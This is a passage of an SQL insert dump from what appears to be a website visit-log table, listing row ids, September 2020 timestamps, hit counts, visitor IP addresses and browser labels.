52.95.21','other'),(538346,1600256835,1,1,0,0,'91.196.178.154','chrome'),(538347,1600257232,1,1,0,0,'66.220.149.120','other'),(538348,1600257282,1,1,0,0,'31.13.127.116','other'),(538349,1600257400,1,1,0,0,'69.171.251.118','other'),(538350,1600257791,1,1,0,0,'173.252.95.3','other'),(538351,1600257857,1,1,0,0,'91.196.178.154','chrome'),(538352,1600258034,1,1,0,0,'69.171.251.19','other'),(538353,1600258230,1,1,0,0,'66.220.149.10','other'),(538354,1600258580,1,1,0,0,'88.155.25.108','chrome'),(538355,1600258762,1,1,0,0,'69.171.251.16','other'),(538356,1600259008,1,1,0,0,'31.13.127.24','other'),(538357,1600259272,1,1,0,0,'66.220.149.120','other'),(538358,1600259875,1,1,0,0,'173.252.95.30','other'),(538359,1600259958,1,1,0,0,'91.196.178.75','chrome'),(538360,1600259998,1,1,0,0,'91.196.178.2','chrome'),(538361,1600260155,1,1,0,0,'91.196.177.69','chrome'),(538362,1600260307,1,1,0,0,'31.13.127.13','other'),(538363,1600260315,1,1,0,0,'91.196.178.40','chrome'),(538364,1600260966,1,1,0,0,'173.252.95.9','other'),(538365,1600261329,1,1,0,0,'91.196.177.69','chrome'),(538366,1600261863,1,1,0,0,'46.211.30.158','chrome'),(538367,1600261958,1,1,0,0,'31.13.127.112','other'),(538368,1600262106,1,1,0,0,'69.171.251.14','other'),(538369,1600262544,1,1,0,0,'173.252.95.7','other'),(538370,1600263196,1,1,0,0,'88.155.106.254','chrome'),(538371,1600263211,1,1,0,0,'173.252.111.16','other'),(538372,1600263301,1,1,0,0,'31.13.127.4','other'),(538373,1600263850,1,1,0,0,'69.171.251.112','other'),(538374,1600264036,1,1,0,0,'66.220.149.10','other'),(538375,1600264362,1,1,0,0,'31.13.127.21','other'),(538376,1600264385,1,1,0,0,'173.252.95.23','other'),(538377,1600264989,1,1,0,0,'69.171.251.111','other'),(538378,1600264994,1,1,0,0,'66.220.149.119','other'),(538379,1600265037,1,1,0,0,'31.13.127.113','other'),(538381,1600265038,1,1,0,0,'173.252.95.21','other'),(538382,1600265442,1,1,0,0,'31.13.127.116','other'),(538383,1600265546,1,1,0,0,'173.252.95.38','other'),(538384,1600265862,1,1,0,0,'69.171.251.9','other'),(538385,1600265897,1,1,0,0,'5.255.253.92','other'),(538386,1600266595,1,1,0,0,'173.252.95.22','other'),(538387,1600267107,1,1,0,0,'31.13.127.13','other'),(538388,1600267269,1,1,0,0,'31.13.127.9','other'),(538389,1600267321,1,1,0,0,'69.171.251.27','other'),(538391,1600267405,1,1,0,0,'173.252.95.6','other'),(538392,1600267693,1,1,0,0,'66.220.149.11','other'),(538393,1600267807,1,1,0,0,'91.196.179.33','chrome'),(538394,1600268412,1,1,0,0,'31.13.127.118','other'),(538395,1600268494,1,1,0,0,'128.124.125.138','other'),(538396,1600268531,1,1,0,0,'31.13.127.10','other'),(538397,1600268559,1,1,0,0,'173.252.95.26','other'),(538398,1600268568,1,1,0,0,'31.13.127.9','other'),(538399,1600268798,1,1,0,0,'69.171.251.14','other'),(538400,1600268799,1,1,0,0,'91.196.179.33','chrome'),(538401,1600268938,1,1,0,0,'173.252.95.27','other'),(538402,1600269170,1,1,0,0,'31.13.127.16','other'),(538403,1600269532,1,1,0,0,'69.171.251.33','other'),(538404,1600269647,1,1,0,0,'173.252.95.11','other'),(538405,1600269812,1,1,0,0,'31.13.127.22','other'),(538406,1600269893,1,1,0,0,'173.252.95.112','other'),(538407,1600270094,1,1,0,0,'173.252.127.1','other'),(538408,1600270376,1,1,0,0,'69.171.251.15','other'),(538409,1600270404,1,1,0,0,'31.13.127.120','other'),(538410,1600270567,1,1,0,0,'173.252.95.5','other'),(538411,1600270574,1,1,0,0,'69.171.251.12','other'),(538412,1600270588,1,1,0,0,'31.13.127.116','other'),(538413,1600270633,1,1,0,0,'173.252.95.10','other'),(538414,1600270683,1,1,0,0,'66.220.149.29','other'),(538415,1600271066,1,1,0,0,'173.252.95.37','other'),(538416,1600271123,1,1,0,0,'173.252.95.13','other'),(538417,1600271195,1,1,0,0,'69.171.251.112','other'),(538418,1600271208,1,1,0,0,'31.13.127.24','other'),(538419,1600271294,1,1,0,0,'173.252.95.34','other'),(538420,1600271331,1,1,0,0,'94.153.28.61','chrome'),(538421,1600271434,1,1,0,0,'69.171.251.35','other'),(538423,1600271553,1,1,0,0,'72.137.84.61','chrome'),(538424,1600271577,1,1,0,0,'173.252.111.10','other'),(538426,1600271578,1,1,0,0,'173.252.111.21','other'),(538427,1600271717,1,1,0,0,'173.252.95.35','other'),(538428,1600272059,1,1,0,0,'31.13.127.18','other'),(538429,1600272260,1,1,0,0,'195.10.210.70','chrome'),(538430,1600272327,2,2,0,0,'173.252.95.30','other'),(538431,1600272833,1,1,0,0,'31.13.127.15','other'),(538432,1600273067,1,1,0,0,'173.252.95.38','other'),(538433,1600273098,1,1,0,0,'91.196.178.2','chrome'),(538434,1600273257,1,1,0,0,'69.171.251.33','other'),(538436,1600273271,1,1,0,0,'173.252.95.14','other'),(538437,1600273369,1,1,0,0,'173.252.95.116','other'),(538438,1600273451,1,1,0,0,'31.13.127.7','other'),(538439,1600273918,1,1,0,0,'69.171.251.29','other'),(538440,1600273922,1,1,0,0,'66.220.149.9','other'),(538441,1600274187,1,1,0,0,'91.196.178.156','chrome'),(538442,1600274598,1,1,0,0,'173.252.95.120','other'),(538444,1600274600,1,1,0,0,'173.252.95.11','other'),(538445,1600274848,1,1,0,0,'91.196.178.13','chrome'),(538446,1600274938,1,1,0,0,'31.13.103.116','other'),(538448,1600275013,1,1,0,0,'69.171.251.13','other'),(538449,1600275063,1,1,0,0,'37.73.95.168','chrome'),(538450,1600275104,1,1,0,0,'31.13.127.21','other'),(538451,1600275203,1,1,0,0,'173.252.95.18','other'),(538452,1600275602,1,1,0,0,'91.196.178.52','chrome'),(538453,1600275720,1,1,0,0,'66.220.149.111','other'),(538454,1600275730,1,1,0,0,'173.252.127.120','other'),(538455,1600275945,1,1,0,0,'173.252.95.19','other'),(538456,1600276149,1,1,0,0,'69.171.251.19','other'),(538457,1600276328,2,2,0,0,'31.13.127.24','other'),(538458,1600276486,1,1,0,0,'31.13.127.18','other'),(538459,1600276582,1,1,0,0,'66.220.149.33','other'),(538460,1600276963,1,1,0,0,'173.252.95.118','other'),(538461,1600277099,1,1,0,0,'91.196.178.14','chrome'),(538462,1600277321,1,1,0,0,'66.220.149.18','other'),(538463,1600277714,1,1,0,0,'31.13.127.19','other'),(538464,1600277715,1,1,0,0,'69.171.251.120','other'),(538465,1600277744,1,1,0,0,'91.196.178.48','chrome'),(538466,1600277786,1,1,0,0,'69.171.251.24','other'),(538467,1600277860,1,1,0,0,'66.220.149.37','other'),(538468,1600278217,1,1,0,0,'173.252.95.43','other'),(538469,1600278406,1,1,0,0,'31.13.127.117','other'),(538470,1600278707,1,1,0,0,'46.211.15.195','chrome'),(538471,1600278864,1,1,0,0,'173.252.95.40','other'),(538472,1600279190,1,1,0,0,'31.13.127.113','other'),(538473,1600279291,1,1,0,0,'173.252.111.120','other'),(538474,1600279636,1,1,0,0,'173.252.95.33','other'),(538475,1600279898,1,1,0,0,'95.215.216.163','chrome'),(538476,1600280039,1,1,0,0,'173.252.111.6','other'),(538478,1600280158,1,1,0,0,'31.13.127.112','other'),(538479,1600280385,1,1,0,0,'173.252.95.17','other'),(538480,1600280549,1,1,0,0,'178.92.249.185','chrome'),(538481,1600280665,1,1,0,0,'173.252.95.25','other'),(538482,1600280782,1,1,0,0,'91.196.178.9','chrome'),(538483,1600280948,1,1,0,0,'31.13.127.21','other'),(538484,1600280976,1,1,0,0,'91.196.178.15','chrome'),(538485,1600281366,1,1,0,0,'91.196.178.102','chrome'),(538486,1600281769,1,1,0,0,'91.196.178.94','chrome'),(538487,1600282045,1,1,0,0,'91.196.178.46','chrome'),(538488,1600282287,1,1,0,0,'173.252.127.9','other'),(538489,1600282397,1,1,0,0,'31.13.127.11','other'),(538490,1600282889,1,1,0,0,'31.13.127.3','other'),(538491,1600282930,1,1,0,0,'173.252.95.119','other'),(538492,1600283152,1,1,0,0,'78.111.185.23','chrome'),(538493,1600283173,1,1,0,0,'173.252.107.11','other'),(538494,1600283174,1,1,0,0,'173.252.107.21','other'),(538495,1600283357,1,1,0,0,'91.196.178.124','chrome'),(538496,1600283699,1,1,0,0,'78.111.186.17','chrome'),(538497,1600283922,1,1,0,0,'31.13.127.14','other'),(538499,1600283942,1,1,0,0,'94.153.2.86','chrome'),(538500,1600284963,1,1,0,0,'91.196.178.132','chrome'),(538501,1600284975,1,1,0,0,'173.252.107.10','other'),(538502,1600285307,1,1,0,0,'173.252.127.16','other'),(538503,1600285444,1,1,0,0,'185.234.67.7','firefox'),(538504,1600285897,2,2,0,0,'185.30.202.111','chrome'),(538505,1600286217,1,1,0,0,'173.252.95.111','other'),(538506,1600286502,1,1,0,0,'31.13.127.19','other'),(538507,1600286523,1,1,0,0,'66.220.149.25','other'),(538508,1600287329,1,1,0,0,'31.13.127.6','other'),(538509,1600287386,1,1,0,0,'69.171.251.38','other'),(538510,1600287398,1,1,0,0,'66.220.149.112','other'),(538511,1600287830,1,1,0,0,'109.229.29.49','chrome'),(538512,1600290148,1,1,0,0,'173.252.95.111','other'),(538513,1600290958,1,0,1,0,'66.249.70.13',''),(538514,1600290976,1,1,0,0,'173.252.95.18','other'),(538515,1600291053,1,1,0,0,'173.252.111.3','other'),(538516,1600299145,1,1,0,0,'173.252.95.9','other'),(538517,1600299157,1,1,0,0,'31.13.103.119','other'),(538518,1600300542,1,1,0,0,'173.252.127.113','other'),(538519,1600300543,1,1,0,0,'173.252.83.118','other'),(538521,1600300544,1,1,0,0,'173.252.83.112','other'),(538522,1600304834,1,1,0,0,'173.252.95.118','other'),(538523,1600306254,1,1,0,0,'173.252.95.3','other'),(538524,1600309608,1,1,0,0,'5.255.253.87','other'),(538525,1600309887,1,1,0,0,'91.196.178.12','chrome'),(538526,1600313272,1,0,1,0,'66.249.70.11',''),(538527,1600316529,1,1,0,0,'31.13.103.116','other'),(538528,1600316812,1,1,0,0,'185.234.67.30','chrome'),(538529,1600318536,1,1,0,0,'31.13.127.5','other'),(538530,1600318665,1,1,0,0,'91.196.178.116','chrome'),(538531,1600318689,1,1,0,0,'173.252.111.23','other'),(538532,1600318690,1,1,0,0,'173.252.111.3','other'),(538533,1600318694,1,1,0,0,'31.13.103.14','other'),(538534,1600319413,1,1,0,0,'46.211.69.229','chrome'),(538535,1600319720,1,1,0,0,'69.171.251.30','other'),(538536,1600319801,1,1,0,0,'31.13.127.12','other'),(538537,1600320092,1,1,0,0,'91.196.178.75','chrome'),(538538,1600320706,1,1,0,0,'173.252.95.120','other'),(538539,1600320768,1,1,0,0,'66.220.149.118','other'),(538540,1600322454,1,1,0,0,'176.36.13.96','other'),(538541,1600323544,1,1,0,0,'31.13.127.17','other'),(538542,1600324095,1,1,0,0,'91.196.178.35','chrome'),(538543,1600324106,1,1,0,0,'173.252.79.9','other'),(538544,1600324134,14,14,0,0,'5.255.253.92','other'),(538545,1600325092,1,1,0,0,'31.13.115.17','other'),(538546,1600325102,1,1,0,0,'91.196.177.46','other'),(538547,1600327262,1,1,0,0,'37.73.190.92','chrome'),(538548,1600327613,1,1,0,0,'91.196.178.48','other'),(538549,1600327772,1,1,0,0,'31.13.127.119','other'),(538550,1600327963,1,1,0,0,'31.13.127.117','other'),(538551,1600328639,1,1,0,0,'173.252.95.119','other'),(538552,1600331373,1,1,0,0,'173.252.79.112','other'),(538553,1600332005,1,1,0,0,'46.211.44.182','chrome'),(538554,1600332251,1,1,0,0,'69.171.251.117','other'),(538555,1600332259,1,1,0,0,'31.13.127.1','other'),(538556,1600332285,1,1,0,0,'66.220.149.14','other'),(538557,1600333501,1,1,0,0,'46.211.81.213','chrome'),(538558,1600333746,1,1,0,0,'31.13.127.24','other'),(538559,1600334374,1,1,0,0,'91.196.178.33','chrome'),(538560,1600335997,1,1,0,0,'173.252.95.28','other'),(538561,1600336086,1,1,0,0,'173.252.127.9','other'),(538562,1600336126,1,1,0,0,'194.44.41.70','chrome'),(538563,1600336231,1,1,0,0,'173.252.95.31','other'),(538564,1600337707,1,1,0,0,'46.211.14.79','chrome'),(538565,1600339767,1,1,0,0,'130.180.218.125','chrome'),(538566,1600340209,1,1,0,0,'195.10.210.70','chrome'),(538567,1600340255,1,1,0,0,'31.13.127.23','other'),(538568,1600340421,1,1,0,0,'173.252.95.7','other'),(538569,1600341142,1,1,0,0,'94.153.3.134','chrome'),(538570,1600341454,1,1,0,0,'88.155.188.101','chrome'),(538571,1600341569,1,1,0,0,'173.252.95.1','other'),(538572,1600342928,1,1,0,0,'91.196.178.137','firefox'),(538573,1600343061,1,1,0,0,'31.13.127.19','other'),(538574,1600345324,1,1,0,0,'91.196.178.166','firefox'),(538575,1600345475,1,1,0,0,'176.36.13.96','other'),(538576,1600346703,1,1,0,0,'173.252.95.33','other'),(538577,1600349902,1,1,0,0,'31.13.127.9','other'),(538578,1600349905,1,1,0,0,'173.252.95.116','other'),(538579,1600349913,1,1,0,0,'91.196.178.8','chrome'),(538580,1600350203,1,1,0,0,'173.252.95.13','other'),(538581,1600350823,1,1,0,0,'91.196.178.65','firefox'),(538582,1600350878,1,1,0,0,'173.252.95.27','other'),(538583,1600350879,1,1,0,0,'66.220.149.1','other'),(538585,1600350880,1,1,0,0,'66.220.149.29','other'),(538586,1600353337,1,1,0,0,'173.252.79.16','other'),(538587,1600356748,1,1,0,0,'193.246.149.185','chrome'),(538588,1600358575,1,1,0,0,'91.196.178.129','chrome'),(538589,1600358955,1,1,0,0,'69.171.251.116','other'),(538590,1600359022,1,1,0,0,'31.13.127.120','other'),(538591,1600359994,1,1,0,0,'178.92.154.185','chrome'),(538592,1600360273,1,1,0,0,'94.158.95.216','chrome'),(538593,1600360552,1,1,0,0,'173.252.127.119','other'),(538594,1600360939,1,1,0,0,'173.252.95.29','other'),(538595,1600362163,1,1,0,0,'69.171.251.22','other'),(538596,1600362188,1,1,0,0,'66.220.149.12','other'),(538597,1600362261,1,1,0,0,'91.196.178.2','chrome'),(538598,1600362394,1,1,0,0,'66.220.149.18','other'),(538599,1600363144,1,1,0,0,'173.252.95.29','other'),(538600,1600363278,1,1,0,0,'185.234.67.7','firefox'),(538601,1600363364,1,1,0,0,'46.133.168.244','chrome'),(538602,1600363418,1,1,0,0,'31.13.127.4','other'),(538603,1600363940,1,1,0,0,'31.13.127.22','other'),(538604,1600363956,1,1,0,0,'91.196.178.183','chrome'),(538605,1600364549,1,1,0,0,'173.252.127.34','other'),(538606,1600364676,1,1,0,0,'46.211.37.97','chrome'),(538607,1600366436,1,1,0,0,'31.13.127.12','other'),(538608,1600366781,1,1,0,0,'173.252.95.30','other'),(538609,1600369259,1,1,0,0,'31.13.127.112','other'),(538610,1600369272,1,1,0,0,'37.73.179.111','chrome'),(538611,1600369383,1,1,0,0,'173.252.95.7','other'),(538612,1600369624,1,1,0,0,'5.255.253.92','other'),(538613,1600370757,1,1,0,0,'5.255.253.87','other'),(538614,1600371667,1,1,0,0,'69.171.251.117','other'),(538615,1600371684,1,1,0,0,'31.13.127.8','other'),(538616,1600372538,1,1,0,0,'5.255.253.87','other'),(538617,1600373691,1,1,0,0,'5.58.104.102','chrome'),(538618,1600373755,1,1,0,0,'195.114.145.131','chrome'),(538619,1600374695,1,1,0,0,'91.196.178.91','chrome'),(538620,1600375610,1,1,0,0,'69.171.251.111','other'),(538621,1600376131,1,1,0,0,'5.255.253.92','other'),(538622,1600376477,1,0,1,0,'66.249.70.11',''),(538623,1600376510,1,1,0,0,'31.13.127.19','other'),(538624,1600376521,1,1,0,0,'173.252.95.113','other'),(538625,1600376849,1,1,0,0,'5.255.253.87','other'),(538626,1600380769,1,1,0,0,'213.180.203.111','other'),(538627,1600382512,1,1,0,0,'213.180.203.111','other'),(538628,1600386127,1,1,0,0,'46.45.185.189','chrome'),(538629,1600388765,1,1,0,0,'31.13.103.11','other'),(538630,1600389188,1,1,0,0,'5.255.253.87','other'),(538631,1600389597,1,1,0,0,'69.171.251.25','other'),(538632,1600389612,1,1,0,0,'31.13.103.15','other'),(538633,1600391818,1,1,0,0,'5.255.253.92','other'),(538634,1600391896,1,1,0,0,'5.45.207.123','other'),(538635,1600393429,1,1,0,0,'5.255.253.92','other'),(538636,1600394507,1,0,1,0,'66.249.70.15',''),(538637,1600394551,1,1,0,0,'5.45.207.123','other'),(538638,1600394833,1,1,0,0,'178.154.200.42','other'),(538639,1600395318,1,1,0,0,'5.255.253.92','other'),(538640,1600397466,2,2,0,0,'5.255.253.92','other'),(538641,1600398366,1,1,0,0,'91.196.178.170','chrome'),(538642,1600401537,1,1,0,0,'31.13.103.111','other'),(538643,1600401577,1,1,0,0,'178.92.249.185','chrome'),(538644,1600402266,1,1,0,0,'5.255.253.87','other'),(538645,1600403038,1,1,0,0,'31.13.127.8','other'),(538646,1600404709,1,1,0,0,'88.155.142.106','chrome'),(538647,1600405159,1,1,0,0,'31.13.127.19','other'),(538648,1600405665,1,1,0,0,'5.255.253.87','other'),(538649,1600405667,1,1,0,0,'178.95.67.225','chrome'),(538650,1600405862,1,1,0,0,'213.180.203.96','other'),(538651,1600405925,1,1,0,0,'66.220.149.117','other'),(538653,1600406517,1,1,0,0,'5.255.253.92','other'),(538654,1600407564,1,1,0,0,'178.154.200.133','other'),(538655,1600407752,1,1,0,0,'213.180.203.111','other'),(538656,1600408864,1,1,0,0,'5.255.253.87','other'),(538657,1600409231,1,1,0,0,'78.111.185.131','chrome'),(538658,1600409736,2,2,0,0,'5.255.253.92','other'),(538659,1600411300,1,1,0,0,'66.220.149.7','other'),(538660,1600411709,1,1,0,0,'5.45.207.123','other'),(538661,1600415819,1,1,0,0,'5.255.253.92','other'),(538662,1600416905,1,1,0,0,'66.220.149.113','other'),(538663,1600417216,1,1,0,0,'3.137.173.144','chrome'),(538664,1600417931,1,1,0,0,'173.252.127.1','other'),(538665,1600418332,1,1,0,0,'173.252.95.111','other'),(538666,1600418432,1,1,0,0,'66.220.149.15','other'),(538667,1600419003,1,1,0,0,'5.255.253.92','other'),(538668,1600420300,2,2,0,0,'173.252.127.23','other'),(538671,1600420768,1,1,0,0,'46.45.185.184','chrome'),(538672,1600421353,1,1,0,0,'66.220.149.5','other'),(538673,1600422608,1,1,0,0,'173.252.127.1','other'),(538674,1600424333,1,1,0,0,'5.255.253.92','other'),(538675,1600424334,1,1,0,0,'69.171.251.2','other'),(538676,1600424339,1,1,0,0,'66.220.149.111','other'),(538677,1600425622,1,1,0,0,'5.255.253.87','other'),(538678,1600426340,1,1,0,0,'5.255.253.92','other'),(538679,1600426704,1,1,0,0,'173.252.95.3','other'),(538680,1600427231,1,1,0,0,'173.252.95.15','other'),(538681,1600427251,1,1,0,0,'31.13.127.24','other'),(538682,1600427910,1,1,0,0,'91.196.178.134','chrome'),(538683,1600429288,1,1,0,0,'82.207.123.107','chrome'),(538684,1600432545,1,1,0,0,'31.13.127.6','other'),(538685,1600437874,1,1,0,0,'91.196.179.69','chrome'),(538686,1600437906,1,1,0,0,'31.13.127.112','other'),(538687,1600438228,1,1,0,0,'92.113.189.91','chrome'),(538688,1600439350,1,1,0,0,'5.255.253.92','other'),(538689,1600440451,1,1,0,0,'66.220.149.117','other'),(538690,1600440827,1,1,0,0,'5.255.253.87','other'),(538691,1600442084,1,1,0,0,'5.255.253.87','other'),(538692,1600442153,1,1,0,0,'66.220.149.24','other'),(538693,1600442154,1,1,0,0,'69.171.251.31','other'),(538694,1600444009,1,1,0,0,'5.255.253.87','other'),(538695,1600444534,1,1,0,0,'173.252.83.19','other'),(538696,1600445131,2,2,0,0,'46.211.69.35','other'),(538697,1600445385,1,1,0,0,'5.255.253.87','other'),(538698,1600445661,1,1,0,0,'91.196.178.2','chrome'),(538699,1600446289,1,1,0,0,'173.252.83.120','other'),(538700,1600446925,1,1,0,0,'69.171.251.32','other'),(538701,1600448055,1,1,0,0,'173.252.95.19','other'),(538702,1600448423,1,1,0,0,'5.45.207.123','other'),(538703,1600449229,1,1,0,0,'5.255.253.87','chrome'),(538704,1600454492,2,2,0,0,'5.255.253.92','other'),(538705,1600454801,1,1,0,0,'173.252.87.12','other'),(538706,1600455020,1,1,0,0,'91.196.178.167','chrome'),(538707,1600455028,1,1,0,0,'173.252.79.6','other'),(538708,1600455192,1,1,0,0,'31.13.127.18','other'),(538709,1600455195,1,1,0,0,'173.252.95.3','other'),(538710,1600456413,1,1,0,0,'173.252.95.14','other'),(538711,1600458380,1,1,0,0,'69.171.251.19','other'),(538712,1600459700,1,1,0,0,'77.75.147.132','chrome'),(538713,1600461619,1,1,0,0,'31.13.127.13','other'),(538714,1600461631,1,1,0,0,'91.196.178.144','chrome'),(538715,1600461995,1,0,1,0,'66.249.70.11',''),(538716,1600463097,1,1,0,0,'31.13.127.2','other'),(538717,1600464960,1,1,0,0,'46.45.185.189','chrome'),(538718,1600476804,1,0,1,0,'66.249.70.15',''),(538719,1600477171,1,1,0,0,'5.255.253.92','other'),(538720,1600480682,1,1,0,0,'5.45.207.105','other'),(538721,1600493407,1,1,0,0,'31.13.127.118','other'),(538722,1600493413,1,1,0,0,'46.45.185.164','chrome'),(538723,1600493429,1,1,0,0,'88.155.159.39','chrome'),(538724,1600494550,1,1,0,0,'31.13.127.12','other'),(538725,1600495048,1,1,0,0,'66.220.149.6','other'),(538726,1600495241,1,1,0,0,'69.171.251.7','other'),(538727,1600495449,1,1,0,0,'31.13.127.1','other'),(538729,1600499409,1,1,0,0,'31.13.127.23','other'),(538730,1600503109,1,1,0,0,'69.171.251.119','other'),(538731,1600505811,1,1,0,0,'130.180.219.73','chrome'),(538732,1600505969,1,1,0,0,'31.13.115.6','other'),(538733,1600508162,1,1,0,0,'66.220.149.119','other'),(538734,1600510340,1,1,0,0,'173.252.95.111','other'),(538735,1600515260,1,1,0,0,'77.137.116.57','chrome'),(538736,1600518243,1,1,0,0,'173.252.107.116','other'),(538737,1600518245,1,1,0,0,'31.13.127.20','other'),(538738,1600520107,1,1,0,0,'188.163.73.52','chrome'),(538739,1600521141,1,1,0,0,'46.31.102.87','chrome'),(538740,1600523568,1,1,0,0,'173.252.95.32','other'),(538741,1600524059,1,1,0,0,'91.196.178.155','chrome'),(538742,1600524898,1,1,0,0,'173.252.95.118','other'),(538743,1600525401,1,1,0,0,'31.13.127.16','other'),(538744,1600526007,1,1,0,0,'31.13.127.6','other'),(538745,1600526020,1,1,0,0,'195.10.210.70','chrome'),(538746,1600526739,1,1,0,0,'66.220.149.25','other'),(538747,1600527180,1,1,0,0,'31.13.127.8','other'),(538748,1600528079,1,1,0,0,'91.196.178.162','chrome'),(538749,1600528499,1,1,0,0,'66.220.149.29','other'),(538750,1600529863,1,1,0,0,'31.13.127.12','other'),(538751,1600531359,1,1,0,0,'46.133.65.247','chrome'),(538752,1600535734,1,1,0,0,'173.252.111.11','other'),(538753,1600537434,1,1,0,0,'66.220.149.3','other'),(538754,1600540459,1,1,0,0,'46.211.52.26','chrome'),(538755,1600540976,1,1,0,0,'46.211.28.9','chrome'),(538756,1600541532,1,1,0,0,'173.252.95.2','other'),(538757,1600542236,1,1,0,0,'31.13.127.1','other'),(538758,1600542319,1,1,0,0,'37.73.10.173','chrome'),(538759,1600543065,1,1,0,0,'173.252.95.18','other'),(538760,1600545427,1,1,0,0,'46.45.185.163','chrome'),(538761,1600546395,1,1,0,0,'31.13.103.17','other'),(538762,1600547433,1,1,0,0,'173.252.95.21','other'),(538763,1600548398,2,0,2,0,'66.249.70.11',''),(538764,1600550125,1,1,0,0,'66.220.149.18','other'),(538765,1600552510,1,1,0,0,'91.196.178.4','chrome'),(538766,1600556437,1,1,0,0,'91.196.178.11','chrome'),(538767,1600556464,1,1,0,0,'66.220.149.13','other'),(538768,1600556465,1,1,0,0,'69.171.251.1','other'),(538769,1600556466,1,1,0,0,'69.171.251.118','other'),(538770,1600556521,1,1,0,0,'173.252.87.116','other'),(538771,1600556960,1,0,1,0,'66.249.70.15',''),(538772,1600565698,1,1,0,0,'199.244.88.132','chrome'),(538773,1600571636,1,1,0,0,'78.111.185.74','chrome'),(538774,1600574184,1,1,0,0,'5.255.253.92','other'),(538775,1600575712,1,1,0,0,'173.252.111.24','other'),(538777,1600575713,1,1,0,0,'173.252.111.111','other'),(538779,1600580455,1,1,0,0,'31.13.103.6','other'),(538780,1600581029,1,1,0,0,'46.45.185.176','chrome'),(538781,1600582560,1,1,0,0,'66.220.149.14','other'),(538782,1600585925,1,1,0,0,'5.255.253.92','other'),(538783,1600586613,1,1,0,0,'31.13.127.21','other'),(538784,1600589630,1,1,0,0,'31.13.103.19','other'),(538785,1600594725,1,1,0,0,'45.132.95.253','chrome'),(538786,1600595083,1,1,0,0,'31.13.127.3','other'),(538787,1600595084,1,1,0,0,'31.13.127.21','other'),(538788,1600595170,1,1,0,0,'31.13.127.17','other'),(538789,1600596675,1,1,0,0,'37.73.181.250','chrome'),(538790,1600598903,1,1,0,0,'91.229.123.157','other'),(538791,1600603136,1,1,0,0,'91.220.205.174','chrome'),(538792,1600604925,1,1,0,0,'173.252.87.11','other'),(538793,1600604928,1,1,0,0,'173.252.79.24','other'),(538794,1600605896,1,1,0,0,'66.220.149.24','other'),(538795,1600606726,1,1,0,0,'173.252.95.22','chrome'),(538796,1600606752,1,1,0,0,'173.252.95.119','chrome'),(538797,1600606753,1,1,0,0,'173.252.95.7','chrome'),(538798,1600615707,1,1,0,0,'173.252.95.19','other'),(538799,1600619015,1,1,0,0,'46.211.35.77','other'),(538800,1600619036,2,2,0,0,'69.171.251.14','other'),(538801,1600626998,1,1,0,0,'93.170.117.25','other'),(538802,1600627036,1,1,0,0,'46.45.185.171','chrome'),(538803,1600628217,1,1,0,0,'216.145.11.94','firefox'),(538804,1600628731,1,1,0,0,'173.252.83.7','other'),(538805,1600629460,1,1,0,0,'91.196.178.165','other'),(538806,1600631427,1,1,0,0,'93.170.117.25','other'),(538807,1600633947,1,0,1,0,'66.249.70.13',''),(538808,1600639026,1,0,1,0,'66.249.70.13',''),(538809,1600654868,1,1,0,0,'46.45.185.167','chrome'),(538810,1600661179,1,1,0,0,'46.211.44.184','chrome'),(538811,1600666444,1,1,0,0,'130.180.218.95','chrome'),(538812,1600667626,1,1,0,0,'66.220.149.1','other'),(538813,1600673626,1,1,0,0,'91.196.177.46','firefox'),(538814,1600675119,1,1,0,0,'93.170.117.25','other'),(538815,1600682190,2,2,0,0,'31.13.127.6','other'),(538816,1600684858,1,1,0,0,'173.252.95.26','chrome'),(538817,1600684883,1,1,0,0,'173.252.95.2','chrome'),(538818,1600684884,1,1,0,0,'173.252.95.22','chrome'),(538819,1600686583,1,1,0,0,'138.197.173.88','chrome'),(538820,1600686585,1,1,0,0,'138.197.152.122','chrome'),(538821,1600686589,1,1,0,0,'138.197.138.211','chrome'),(538822,1600686592,1,1,0,0,'159.203.32.136','chrome'),(538823,1600695669,1,1,0,0,'91.196.177.46','firefox'),(538824,1600697913,1,1,0,0,'91.196.178.2','chrome'),(538825,1600697944,1,1,0,0,'31.13.127.21','other'),(538826,1600697952,1,1,0,0,'31.13.127.23','other'),(538827,1600697953,1,1,0,0,'31.13.127.118','other'),(538828,1600697954,1,1,0,0,'31.13.127.11','other'),(538829,1600698301,1,1,0,0,'69.171.251.118','other'),(538830,1600698966,1,1,0,0,'94.153.18.233','chrome'),(538831,1600699154,1,1,0,0,'91.196.178.2','chrome'),(538832,1600700744,1,1,0,0,'94.153.65.209','chrome'),(538833,1600700936,1,1,0,0,'178.133.33.205','chrome'),(538834,1600701189,1,1,0,0,'88.155.169.199','chrome'),(538835,1600702585,1,1,0,0,'195.114.121.188','chrome'),(538836,1600705135,1,1,0,0,'212.162.135.97','chrome'),(538837,1600705164,1,1,0,0,'69.171.251.37','other'),(538838,1600705445,1,1,0,0,'173.252.87.4','other'),(538839,1600709136,1,1,0,0,'195.10.210.70','chrome'),(538840,1600709511,1,1,0,0,'194.44.236.49','other'),(538841,1600710343,1,1,0,0,'94.153.21.87','chrome'),(538842,1600711580,1,1,0,0,'146.120.97.26','chrome'),(538843,1600712271,1,1,0,0,'173.252.95.9','other'),(538844,1600713699,1,1,0,0,'193.164.94.214','chrome'),(538845,1600715069,1,1,0,0,'91.196.178.111','chrome'),(538846,1600715464,1,1,0,0,'94.153.9.141','chrome'),(538847,1600716714,1,1,0,0,'178.94.172.222','chrome'),(538848,1600717474,2,2,0,0,'173.252.111.12','other'),(538849,1600717475,1,1,0,0,'173.252.111.8','other'),(538852,1600718907,1,1,0,0,'128.124.213.127','chrome'),(538853,1600719464,1,0,1,0,'66.249.70.11',''),(538854,1600719978,1,1,0,0,'176.36.147.214','chrome'),(538855,1600721999,1,1,0,0,'46.45.185.161','chrome'),(538856,1600723497,1,1,0,0,'31.13.127.6','other'),(538857,1600725428,1,1,0,0,'173.252.111.20','other'),(538860,1600726263,2,2,0,0,'173.252.111.120','other'),(538861,1600726271,1,1,0,0,'91.196.178.68','chrome'),(538862,1600727738,1,1,0,0,'69.171.251.118','other'),(538863,1600727775,1,1,0,0,'37.73.103.80','chrome'),(538864,1600729088,1,1,0,0,'192.38.139.82','chrome'),(538865,1600742944,26,26,0,0,'5.255.253.92','other'),(538866,1600742955,21,21,0,0,'213.180.203.111','other'),(538867,1600742958,1,1,0,0,'5.255.253.81','other'),(538868,1600742963,5,5,0,0,'178.154.200.129','other'),(538869,1600742966,1,1,0,0,'5.45.207.159','other'),(538870,1600742971,1,1,0,0,'178.154.200.111','other'),(538871,1600742978,2,2,0,0,'5.255.253.158','other'),(538872,1600742980,1,1,0,0,'178.154.200.15','other'),(538873,1600742983,1,1,0,0,'5.45.207.83','other'),(